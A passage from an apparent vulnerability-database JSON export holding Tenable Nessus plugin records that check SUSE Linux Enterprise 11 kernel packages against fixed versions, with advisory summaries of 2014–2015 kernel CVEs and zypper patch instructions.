value:\"https://bugzilla.suse.com/show_bug.cgi?id=927786\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929142\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930761\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931538\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932458\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933429\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933904\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933936\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=934742\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=934944\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935053\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935572\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935705\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935866\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936077\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936423\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936637\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937402\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937444\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937503\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937855\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939910\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939994\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940338\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940398\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9728/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9729/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9730/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9731/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-0777/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-1420/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-1805/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2150/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2830/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4167/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4700/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5364/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5366/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5707/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151611-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?441d7fc3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for VMWare 11-SP3 :\n\nzypper in -t patch slessp3-kernel-201508-12100=1\n\nSUSE Linux Enterprise Server 11-SP3 :\n\nzypper in -t patch slessp3-kernel-201508-12100=1\n\nSUSE Linux Enterprise Server 11-EXTRA :\n\nzypper in -t patch slexsp3-kernel-201508-12100=1\n\nSUSE Linux Enterprise Desktop 11-SP3 :\n\nzypper in -t patch sledsp3-kernel-201508-12100=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3 :\n\nzypper in -t patch dbgsp3-kernel-201508-12100=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-bigsmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-bigsmp-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-bigsmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-bigsmp-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED11|SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED11 / SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED11\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED11 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-ec2-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-bigsmp-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-bigsmp-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-bigsmp-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-bigsmp-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-default-man-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-default-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-default-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-default-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-source-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-syms-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-trace-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-trace-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-trace-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-default-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-ec2-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-ec2-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-ec2-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-source-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-syms-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-trace-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-bigsmp-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-default-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-default-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-default-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-default-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-source-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-syms-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-trace-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-extra-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-base-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-devel-3.0.101-0.47.67.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-extra-3.0.101-0.47.67.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T14:23:03", "description": "The SUSE Linux Enterprise 11 SP4 kernel was updated to receive various\nsecurity and bugfixes.\n\nFollowing security bugs were fixed :\n\n - CVE-2015-6252: Possible file descriptor leak for each\n VHOST_SET_LOG_FDcommand issued, this could eventually\n wasting available system resources and creating a denial\n of service (bsc#942367).\n\n - CVE-2015-5707: Possible integer overflow in the\n calculation of total number of pages in\n bio_map_user_iov() (bsc#940338).\n\n - CVE-2015-5364: The (1) udp_recvmsg and (2) udpv6_recvmsg\n functions in the Linux kernel before 4.0.6 do not\n properly consider yielding a processor, which allowed\n remote attackers to cause a denial of service (system\n hang) via incorrect checksums within a UDP packet flood\n (bsc#936831).\n\n - CVE-2015-5366: The (1) udp_recvmsg and (2) udpv6_recvmsg\n functions in the Linux kernel before 4.0.6 provide\n inappropriate -EAGAIN return values, which allowed\n remote attackers to cause a denial of service (EPOLLET\n epoll application read outage) via an incorrect checksum\n in a UDP packet, a different vulnerability than\n CVE-2015-5364 (bsc#936831).\n\n - CVE-2015-1420: Race condition in the handle_to_path\n function in fs/fhandle.c in the Linux kernel through\n 3.19.1 allowed local users to bypass intended size\n restrictions and trigger read operations on additional\n memory locations by changing the handle_bytes value of a\n file handle during the execution of this function\n (bsc#915517).\n\n - CVE-2015-1805: The (1) pipe_read and (2) pipe_write\n implementations in fs/pipe.c in the Linux kernel before\n 3.16 do not properly consider the side effects of failed\n __copy_to_user_inatomic and __copy_from_user_inatomic\n calls, which allows local users to cause a denial of\n service (system crash) or possibly gain privileges via a\n crafted application, aka an 'I/O' vector array overrun.\n (bsc#933429)\n\n - CVE-2015-2150: Xen 3.3.x through 4.5.x and the Linux\n kernel through 3.19.1 do not properly restrict access to\n PCI command registers, which might allow local guest\n users to cause a denial of service (non-maskable\n interrupt and host crash) by disabling the (1) memory or\n (2) I/O decoding for a PCI Express device and then\n accessing the device, which triggers an Unsupported\n Request (UR) response. (bsc#919463)\n\n - CVE-2015-2830: arch/x86/kernel/entry_64.S in the Linux\n kernel before 3.19.2 does not prevent the TS_COMPAT flag\n from reaching a user-mode task, which might allow local\n users to bypass the seccomp or audit protection\n mechanism via a crafted application that uses the (1)\n fork or (2) close system call, as demonstrated by an\n attack against seccomp before 3.16. (bsc#926240)\n\n - CVE-2015-4700: The bpf_int_jit_compile function in\n arch/x86/net/bpf_jit_comp.c in the Linux kernel before\n 4.0.6 allowed local users to cause a denial of service\n (system crash) by creating a packet filter and then\n loading crafted BPF instructions that trigger late\n convergence by the JIT compiler (bsc#935705).\n\n - CVE-2015-4167: The udf_read_inode function in\n fs/udf/inode.c in the Linux kernel before 3.19.1 did not\n validate certain length values, which allowed local\n users to cause a denial of service (incorrect data\n representation or integer overflow, and OOPS) via a\n crafted UDF filesystem (bsc#933907).\n\n - CVE-2015-0777: drivers/xen/usbback/usbback.c in\n linux-2.6.18-xen-3.4.0 (aka the Xen 3.4.x support\n patches for the Linux kernel 2.6.18), as used in the\n Linux kernel 2.6.x and 3.x in SUSE Linux distributions,\n allows guest OS users to obtain sensitive information\n from uninitialized locations in host OS kernel memory\n via unspecified vectors. (bsc#917830)\n\n - CVE-2014-9728: The UDF filesystem implementation in the\n Linux kernel before 3.18.2 did not validate certain\n lengths, which allowed local users to cause a denial of\n service (buffer over-read and system crash) via a\n crafted filesystem image, related to fs/udf/inode.c and\n fs/udf/symlink.c (bsc#933904).\n\n - CVE-2014-9730: The udf_pc_to_char function in\n fs/udf/symlink.c in the Linux kernel before 3.18.2\n relies on component lengths that are unused, which\n allowed local users to cause a denial of service (system\n crash) via a crafted UDF filesystem image (bsc#933904).\n\n - CVE-2014-9729: The udf_read_inode function in\n fs/udf/inode.c in the Linux kernel before 3.18.2 did not\n ensure a certain data-structure size consistency, which\n allowed local users to cause a denial of service (system\n crash) via a crafted UDF filesystem image (bsc#933904).\n\n - CVE-2014-9731: The UDF filesystem implementation in the\n Linux kernel before 3.18.2 did not ensure that space is\n available for storing a symlink target's name along with\n a trailing \\0 character, which allowed local users to\n obtain sensitive information via a crafted filesystem\n image, related to fs/udf/symlink.c and fs/udf/unicode.c\n (bsc#933896).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "published": "2015-10-06T00:00:00", "title": "SUSE SLED11 / SLES11 Security Update : kernel-source (SUSE-SU-2015:1678-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2830", "CVE-2015-1420", "CVE-2015-6252", "CVE-2015-5364", "CVE-2014-9728", "CVE-2014-9730", "CVE-2015-5366", "CVE-2015-0777", "CVE-2014-9729", "CVE-2015-2150", "CVE-2015-4167", "CVE-2014-9731", "CVE-2015-5707", "CVE-2015-4700", "CVE-2015-1805"], "modified": "2015-10-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-xen-extra", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-pae", "p-cpe:/a:novell:suse_linux:kernel-ec2-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-trace-base", "p-cpe:/a:novell:suse_linux:kernel-source", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-trace", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:kernel-trace-devel", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-pae-extra", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-pae-base", "p-cpe:/a:novell:suse_linux:kernel-pae-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-trace-extra", "p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-ec2", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "p-cpe:/a:novell:suse_linux:kernel-ec2-devel"], "id": "SUSE_SU-2015-1678-1.NASL", "href": "https://www.tenable.com/plugins/nessus/86290", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1678-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86290);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-9728\", \"CVE-2014-9729\", \"CVE-2014-9730\", \"CVE-2014-9731\", \"CVE-2015-0777\", \"CVE-2015-1420\", \"CVE-2015-1805\", \"CVE-2015-2150\", \"CVE-2015-2830\", \"CVE-2015-4167\", \"CVE-2015-4700\", \"CVE-2015-5364\", \"CVE-2015-5366\", \"CVE-2015-5707\", \"CVE-2015-6252\");\n script_bugtraq_id(72357, 73014, 73699, 73921, 74951, 74963, 74964, 75001, 75356, 75510);\n\n script_name(english:\"SUSE 